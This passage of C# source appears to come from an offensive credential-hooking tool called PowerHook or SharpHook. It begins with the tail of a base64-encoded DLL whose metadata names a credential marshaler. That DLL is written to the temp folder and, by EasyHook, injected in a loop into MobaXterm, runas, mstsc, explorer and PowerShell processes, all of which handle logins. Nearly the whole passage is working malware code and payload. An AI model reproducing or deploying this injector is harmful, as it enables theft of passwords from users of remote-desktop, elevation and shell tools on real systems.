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AAAAAAAAAAAAUAAADAAAAKAxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==");

            }
            EasyHook.RemoteHooking.IpcCreateServer<PowerHook.ServerInterface>(ref channelName, System.Runtime.Remoting.WellKnownObjectMode.Singleton);

            // Get the full path to the assembly we want to inject into the target process
            string injectionLibrary = path;
            while (true)
            {
                //Reset list of PIDs and get processes
                PIDs.Clear();
                processes = Process.GetProcesses().ToList();

                var SupportedProcesses = new List<string>()
                {
                    "MobaXterm",
                    "runas",
                    "mstsc",
                    //"cmd",
                    "explorer",
                    "powershell"
                };

                

                for (int i = 0; i < processes.Count; i++)
                {
                    PIDs.Add(processes[i].Id);

                    SupportedProcesses.ForEach(delegate (String Pname)
                    {
                        if (processes[i].ProcessName == Pname && injectedProcesses.IndexOf(processes[i].Id) == -1)
                        {
                            try
                            {

                                targetPID = processes[i].Id;


                                Console.WriteLine("[*] Attempting to inject into {0}", processes[i].ProcessName);

                                // inject into existing process
                                EasyHook.RemoteHooking.Inject(
                                    targetPID,          // ID of process to inject into
                                    injectionLibrary,   // 32-bit library to inject (if target is 32-bit)
                                    injectionLibrary,   // 64-bit library to inject (if target is 64-bit)
                                    channelName         // the parameters to pass into injected library
                                    );
                                injectedProcesses.Add(processes[i].Id);

                             

                            }
                            catch (Exception e)
                            {
                                Console.ForegroundColor = ConsoleColor.Red;
                                Console.WriteLine("[-] There was an error while injecting into target:");
                                Console.ResetColor();
                                Console.WriteLine(e.ToString());
                            }
                        }
                    });
                   
                }
                //check if any of our injected processes have exited
                for(int i = 0; i < injectedProcesses.Count; i++)
                {
                    if(PIDs.IndexOf(injectedProcesses[i]) == -1)
                    {
                        Console.WriteLine("[*] Process {0} has exited", injectedProcesses[i].ToString());
                        injectedProcesses.Remove(injectedProcesses[i]);
                    }
                }
                //sleep to avoid nuking the computer
                Thread.Sleep(1500);
               
            }
        }
        static void GetDLLs(string b64Dll)
        {
            
            string base64 = b64Dll;
            byte[] toDLL = Convert.FromBase64String(base64);
            string DropDir = Path.GetTempPath();
            File.WriteAllBytes(DropDir + @"PowerHook.dll", toDLL);
            Console.WriteLine("[*] Loaded PowerHook.dll");
            
        }


    }
}
